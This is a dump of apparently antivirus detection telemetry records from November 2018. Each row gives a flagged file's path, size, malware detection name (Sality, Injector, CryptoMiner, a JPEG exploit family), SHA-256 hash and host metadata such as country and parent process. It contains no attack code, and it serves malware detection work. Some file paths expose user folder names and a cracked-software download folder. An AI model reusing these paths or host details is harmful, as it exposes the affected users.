  Row(detection=Row(filename='avscan-20181102-055537-e41373d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055537-E41373D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060312-f3a77115', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060312-F3A77115', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050459-d1b8ea34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050459-D1B8EA34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051110-ae682a52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051110-AE682A52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051454-33f507f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051454-33F507F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051242-e585deb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051242-E585DEB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060758-9da04f3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060758-9DA04F3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f_0020a4', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_0020a4', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='81e2165a9cda92e60e428fd8e7698452208edc18149b25474c8358fa8572a5ba', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-02T14:30:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055420-b62db57e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055420-B62DB57E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050557-f3dff6af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050557-F3DFF6AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052059-0df43101', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052059-0DF43101', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:28:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053507-074d5f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053507-074D5F2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:39:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054313-2909e928', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054313-2909E928', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055934-71412eef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055934-71412EEF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052507-a150b2bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052507-A150B2BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055924-6b7ae7f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055924-6B7AE7F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053710-50b79a9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053710-50B79A9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:37:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='74de5db7598d2bcb3ad2c23a84910509fb529233a76f0aa5ad243063f4fd94dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\74DE5DB7598D2BCB3AD2C23A84910509FB529233A76F0AA5AD243063F4FD94DD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='74de5db7598d2bcb3ad2c23a84910509fb529233a76f0aa5ad243063f4fd94dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050916-6ae87fc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050916-6AE87FC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051250-ea36d080', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051250-EA36D080', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055420-b6824d14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055420-B6824D14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051454-340bbdf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051454-340BBDF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061527-a9c9fa0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061527-A9C9FA0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052614-c93587e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052614-C93587E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:48:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='database pkwt.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DATABASE PKWT\\DATABASE PKWT.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-13-32-37.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T08:52:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:32:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sysprep.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\hourly.0\\Software\\OLD\\HP - Simulator\\Training Simulator\\18406- LAB Files\\ClassFiles\\Sysprep\\sysprep.exe', filesize=192000, name='W32/Sality.Y.#M1.#R1'), hash='4a964ebc488535678b61481ca220853d38ebc8ebceed96133d900cb0c73f75aa', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T09:43:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155315-a5f99bd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155315-A5F99BD0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152008-152c91d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-152008-152C91D3', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155205-9a346ffe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155205-9A346FFE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eventcreate.exe', filepath='H:\\WINDOWS\\$NtServicePackUninstall$\\eventcreate.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='4e46c4a1cdbadd9320347784b90b7a2f98ea707bec99fbcd83049b36b83548e6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T10:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dcim.exe', filepath='E:\\DCIM\\DCIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:22:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tetap audit.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\PENGANGKATAN TETAP AUDIT\\TETAP AUDIT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:16:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T03:43:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:50:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2400000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='313a83ad30e993d19cc51cc281b8ae29526266f1038c59f9a9737c9dadf68376', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T22:38:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144853-d62ea60a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61c375b4\\AVSCAN-20181101-144826-D1B8DDEB\\AVSCAN-20181101-144853-D62EA60A', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav.exe', filepath='D:\\Fav.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='n6muu6ognf.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsj35C.tmp\\n6MUu6OGNF.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='2a3c3a5f2509b64fb77f23693b3b1a9cf2f369f46b4e81d9929461a21cf727cd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Blackmagic Design DaVinci Resolve Studio 15.1.2.8 + Crack [CracksMind]\\DaVinci_Resolve_Studio_15.1.2_Windows.exe', parentsize=968373253, timestamp='2018-11-01T21:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\{28e56cfb-e30e-4f66-85d8-339885b726b8}\\Uninstall.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='512982bfcdf8e5d6b18409af4fc82208b0f59112c3b55181259a9c2f7b427069', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:26:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='laporan pkl.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\Hari 8 PKL\\Contoh Laporan PKL\\Laporan PKL.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T19:18:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows.old.001\\Users\\Lidia e Pedro\\AppData\\Local\\Temp\\nsaE61B.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:25:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8b53130fafc01d4121f32500954769202fedba43f7855bac411f7780dd169182', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-32\\8B53130FAFC01D4121F32500954769202FEDBA43F7855BAC411F7780DD169182', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='8b53130fafc01d4121f32500954769202fedba43f7855bac411f7780dd169182', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-8.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-9.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-31.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T10:50:08Z'), dt=datetime.date(2018, 11, 1)),
